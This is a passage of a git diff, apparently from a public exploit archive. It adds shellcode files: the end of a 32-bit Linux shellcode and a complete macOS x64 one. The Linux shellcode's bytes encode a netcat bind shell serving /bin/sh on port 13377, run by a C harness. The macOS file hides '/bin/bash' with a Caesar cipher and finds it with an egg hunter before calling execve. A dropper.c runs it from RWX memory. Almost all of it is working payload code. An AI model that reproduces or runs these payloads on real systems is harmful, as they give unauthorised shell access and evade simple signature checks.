esi + mov byte [esi + 0x4 + eax], ah ; null-byte decoder + lea edi, [esi + 0x4+eax+0x1] + xor eax,eax + jmp edi + +############################################## + +// Filename: shellcode.c +// Compile: gcc -m32 -z execstack -fno-stack-protector shellcode.c -o shellcode + +#include +#include + +unsigned char code[] = \ + +"\x31\xc0\xb0\x08\xd9\xd0\xeb\x43\x2d\x76\x70\x31\x33\x33\x37\x37\x90\x8d\x56\x04\xb0\x0c\xd9\xd0" +"\xeb\x31\x2d\x6c\x76\x76\x65\x2f\x62\x69\x6e\x2f\x73\x68\x90\x8d\x4e\x04\xb0\x0c\xd9\xd0\xeb\x1b" +"\x2f\x62\x69\x6e\x2f\x2f\x2f\x2f\x2f\x2f\x6e\x63\x18\x8d\x5e\x04\x50\x52\x51\x53\x99\x89\xe1\xb0" +"\x0b\xcd\x80\xd9\x74\x24\xf4\x88\x64\x06\x04\x8d\x7c\x30\x05\x31\xc0\xff\xe7"; + + +main() { + + printf("Shellcode Length: %d\n", strlen(code)); + int (*ret)() = (int(*)())code; + + ret(); + +} \ No newline at end of file diff --git a/shellcodes/macos/51178.txt b/shellcodes/macos/51178.txt new file mode 100644 index 000000000..36d2b358a --- /dev/null +++ b/shellcodes/macos/51178.txt @@ -0,0 +1,244 @@ +# Shellcode Title: macOS/x64 - Execve Caesar Cipher String Null-Free Shellcode (286 Bytes) +# Shellcode Author: Bobby Cooke (boku) @0xBoku github.com/boku7 +# Date: 12/20/2022 +# Tested on: macOS Monterey; 21.6.0 Darwin Kernel Version; x86_64 +# Shellcode Description: +# macOS 64 bit shellcode. Uses execve syscall to spawn bash. The string is ceasar cipher crypted with the increment key of 7 within the shellcode. The shellcode finds the string in memory, copies the string to the stack, deciphers the string, and then changes the string terminator to 0x00. +# Shoutout to IBM X-Force Red Adversary Simulation team! Currently working through EXP-312 and tinkering with macOS shellcoding. Shoutout to the offsec team for the cool course! +# Compile & run: +# nasm -f macho64 execve.asm -o execve +# for x in $(objdump -d execve --x86-asm-syntax=intel | grep "^ " | cut -f1 | awk -F: '{print $2}'); do echo -n "\x"$x; done; echo +# # Add shellcode to dropper.c +# gcc dropper.c -o dropper +# sh-3.2$ pstree -p $(echo $$) | grep $$ +# \-+= 28533 bobby sh +# sh-3.2$ ./dropper +# [+] testcode Length: 286 Bytes +# [+] Copying testcode from variable at 0x10aeeade0 to allocated RWX memory at 0x10b030000 +# [+] Executing testcode at 0x10b030000 +# bobby$ pstree -p $(echo $$) | grep -B1 $$ +# \-+= 28533 bobby sh +# \-+= 28584 bobby (bash) + +bits 64 +global _main + +_main: + create_stackframe: + push rbp ; push current base pointer to the stack + mov rbp, rsp ; Set Base Stack Pointer for new Stack-Frame + sub rsp, 0x60 ; create space for string + mov [rbp-0x8], rsp ; Save destination string buffer address + jmp short lilypad_1 + +; char * string eggHunter(egg); +; RAX RDIa +; description: starts searching for the supplied egg starting from the callers return address +eggHunter: + mov rcx, [rsp] ; start the egghunter from the caller function return address + hunt: + inc rcx ; move to the hunter to the next byte + cmp [rcx], di ; did we find the first egg? + jne hunt ; if not, continue hunt + + add cx, 0x2 ; move hunter to 2nd egg location + cmp [rcx], di ; did we find the second egg? + jne hunt ; if not, continue hunt + + add cx, 0x2 ; both eggs found! Move hunter +2 to return the start of buffer addr + xchg rax, rcx ; return start of string address + ret + +; int length strsize(&string, terminator); +; RAX RDI RSI +; description: gets string size of a string that is terminated with a predetermined non-null byte. Terminator byte not included. +strsize: + xor rax, rax ; clear register + xor rcx, rcx ; set the counter to zero + strsize_loop: + mov rcx, rdi ; start of string address + add rcx, rax ; current memory location of char in string + cmp [rcx], sil ; is this the null terminator? + je strsize_return + prevent_infinite_loop: + cmp ax, 0x1001 ; compare value in RAX to 0x1001 (prevent infinite mem scanning) + jg strsize_fail2find ; if value in RAX is greater, jump to label + inc rax ; move to the next char in the string + jmp strsize_loop + strsize_fail2find: + xor rax, rax ; return null/ 0x0 + strsize_return: + ret + +lilypad_1: + jmp short lilypad_2 + +; char * string terminateString(&string, terminator); +; RAX RDI RSI +; description: Finds the string terminator and changes it to a null byte +terminateString: + xor rcx, rcx ; set the counter to zero + mov rcx, rdi ; start address to look for terminator + loop_find_terminator: + cmp [rcx], sil ; is this the null terminator? + je found_terminator + inc rcx ; move to the next char in the string + jmp loop_find_terminator + found_terminator: + mov [rcx], al + ret + +; void * dst_addr move_memory(void *dst_addr, void *src_addr, size_t mem_size); +; RAX RDI RSI RDX +; description: Move memory from source address to destination address +; ARG1 - RDI: destination address +; ARG2 - RSI: source address +; ARG3 - RDX: size of the memory +move_memory: + ; Loop through memory and move each byte from source to destination + push rdi ; save the destination address so we can return it at the end + xor rax, rax ; register to temporarily hold the byte we are copying + move_memory_loop: + mov al, [rsi] ; read the byte from source address into the temporary register + mov [rdi], al ; write the byte at the destination address + inc rsi ; increment source address + inc rdi ; increment destination address + dec rdx ; decrement memory size + jnz move_memory_loop ; repeat loop until memory size is 0 + ; Return to caller + pop rax ; return the destination address of the memory to the caller + ret + +lilypad_2: + jmp short lilypad_3 + +; void clear_memory(void *dst_addr, size_t mem_size); +; RDI RSI +; description: Writes 0x00 bytes to a destination address +; ARG1 - RDI: a pointer to the destination address +; ARG2 - RSI: the size of the memory to be written to +clear_memory: + mov rcx, rsi ; load memory size from second argument into rcx + xor rax, rax + ; Loop through memory and write 0x00 to each byte in destination address + clrmem_loop: + mov byte [rdi], al ; write 0x00 to byte in destination address + inc rdi ; increment destination address + dec rcx ; decrement memory size + jnz clrmem_loop ; repeat loop until memory size is 0 + + ret ; Return to caller + +; void basicCaesar_Decrypt(int stringLength, unsigned char * string, int chiperDecrementKey); +; RDI RSI RDX +basicCaesar_Decrypt: + bcd_loop: + sub [rsi], dl ; Subtract the value of dl from the memory location pointed to by RSI + inc rsi ; Increment RSI to point to the next character + dec rdi ; Decrement stringLength counter + test rdi,rdi ; Test if stringLength counter is zero + jnz bcd_loop ; If stringLength counter is not zero, jump back to the beginning of the loop + + ret ; Return to caller + +lilypad_3: + ; *string = eggHunter(egg); Starts hunt from return address of caller + find_execve_string: + xor rdi, rdi ; clear register + mov di, 0xBCB0 ; Arg 1: Our egg + call eggHunter ; returns string start address + mov [rbp-0x10], rax ; Save string address + + get_strlen: + mov rdi, [rbp-0x10] ; Arg 1: string start address + xor rsi, rsi ; clear register + mov sil, 0xFF ; Arg 2: string terminator + call strsize ; returns string size + mov [rbp-0x18], rax ; Save string size + + ; move_memory(dst_addr, src_addr, mem_size); + ; RDI RSI RDX + copy_str2stack: + mov rdi, [rbp-0x8] ; Arg 1: String buffer on stack + mov rsi, [rbp-0x10] ; Arg 2: Original string location + mov rdx, [rbp-0x18] ; Arg 3: size + call move_memory + + ; basicCaesar_Decrypt(int stringLength, unsigned char * string, int chiperDecrementKey); + ; RDI RSI RDX + do_caesar_cipher_decrypt: + mov rdi, [rbp-0x18] ; Arg 1: string size + mov rsi, [rbp-0x8] ; Arg 2: String buffer on stack + xor rdx, rdx ; clear register + add dl, 0x7 ; Arg 3: Ceaser Chiper Key: 7 + call basicCaesar_Decrypt ; returns string size + + + do_terminate_string: + mov rdx, [rbp-0x18] ; string size + mov rdi, [rbp-0x8] ; String buffer on stack + add rdi, rdx ; Arg 1: string terminator location + xor rsi, rsi ; clear register + mov sil, 0x1 ; Arg 2: mem size to null + call clear_memory ; returns string size + + ; execve("/bin/bash",NULL,NULL) + execve: + mov rdi, [rbp-0x8] ; Arg 1: String buffer on stack + xor rsi, rsi ; Arg 2: NULL + xor rdx, rdx ; Arg 3: NULL + xor rax, rax ; clear register for syscall number setup + mov al, 0x2 ; set a bit in register + ror rax, 0x28 ; move the bit over 28 bits to the right in the register + mov al, 0x3b ; set the lower byte (AL) of the RAX register to the execve syscall number + syscall ; do the syscall interrupt + + fixstack: + add rsp, 0x60 ; clear allocated stack space + pop rbp ; restore stack base pointer + ret ; return to caller + +; ~~ Ceaser Chiper String Cryptor ~~ +; Original String: /bin/bash +; String Length: 9 +; Ceaser Chiper Key: 7 +; Chiper String: 6ipu6ihzo +; unsigned char chiperString[] = {0x36,0x69,0x70,0x75,0x36,0x69,0x68,0x7a,0x6f}; +; unsigned char chiperString[] = "\x36\x69\x70\x75\x36\x69\x68\x7a\x6f"; +; Dechipered String: /bin/bash +shell_path_string: db 0xB0,0xBC,0xB0,0xBC,"6ipu6ihzo",0xFF + +########################################################################################################################################### + +// dropper.c + +#include +#include +#include +#include +int (*execute_testcode)(); + +const unsigned char testcode[] = +"\x55\x48\x89\xe5\x48\x83\xec\x60\x48\x89\x65\xf8\xeb\x3c\x48\x8b\x0c\x24\x48\xff\xc1\x66\x39\x39\x75\xf8\x66\x83\xc1\x02\x66\x39\x39\x75\xef\x66\x83\xc1\x02\x48\x91\xc3\x48\x31\xc0\x48\x31\xc9\x48\x89\xf9\x48\x01\xc1\x40\x38\x31\x74\x0e\x66\x3d\x01\x10\x7f\x05\x48\xff\xc0\xeb\xea\x48\x31\xc0\xc3\xeb\x28\x48\x31\xc9\x48\x89\xf9\x40\x38\x31\x74\x05\x48\xff\xc1\xeb\xf6\x88\x01\xc3\x57\x48\x31\xc0\x8a\x06\x88\x07\x48\xff\xc6\x48\xff\xc7\x48\xff\xca\x75\xf1\x58\xc3\xeb\x1f\x48\x89\xf1\x48\x31\xc0\x88\x07\x48\xff\xc7\x48\xff\xc9\x75\xf6\xc3\x28\x16\x48\xff\xc6\x48\xff\xcf\x48\x85\xff\x75\xf3\xc3\x48\x31\xff\x66\xbf\xb0\xbc\xe8\x6d\xff\xff\xff\x48\x89\x45\xf0\x48\x8b\x7d\xf0\x48\x31\xf6\x40\xb6\xff\xe8\x76\xff\xff\xff\x48\x89\x45\xe8\x48\x8b\x7d\xf8\x48\x8b\x75\xf0\x48\x8b\x55\xe8\xe8\x96\xff\xff\xff\x48\x8b\x7d\xe8\x48\x8b\x75\xf8\x48\x31\xd2\x80\xc2\x07\xe8\xab\xff\xff\xff\x48\x8b\x55\xe8\x48\x8b\x7d\xf8\x48\x01\xd7\x48\x31\xf6\x40\xb6\x01\xe8\x84\xff\xff\xff\x48\x8b\x7d\xf8\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\xb0\x02\x48\xc1\xc8\x28\xb0\x3b\x0f\x05\x48\x83\xc4\x60\x5d\xc3\xb0\xbc\xb0\xbc\x36\x69\x70\x75\x36\x69\x68\x7a\x6f\xff"; + +int main() { + size_t testcode_size = sizeof(testcode); + + printf("[+] testcode Length: %lu Bytes\n", testcode_size); + + void *rwx_memory = mmap(0, 0x1024, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0); + + if (rwx_memory == MAP_FAILED) { + printf("[!] Failed to allocate RWX memory\n"); + perror("mmap"); + exit(-1); + } + + printf("[+] Copying testcode from variable at %p to allocated RWX memory at %p\n",testcode,rwx_memory); + memcpy(rwx_memory, testcode, sizeof(testcode)); + execute_testcode = rwx_memory; + + printf("[+] Executing testcode at %p\n",rwx_memory); + execute_testcode(); + return 0; +} \ No newline at end of file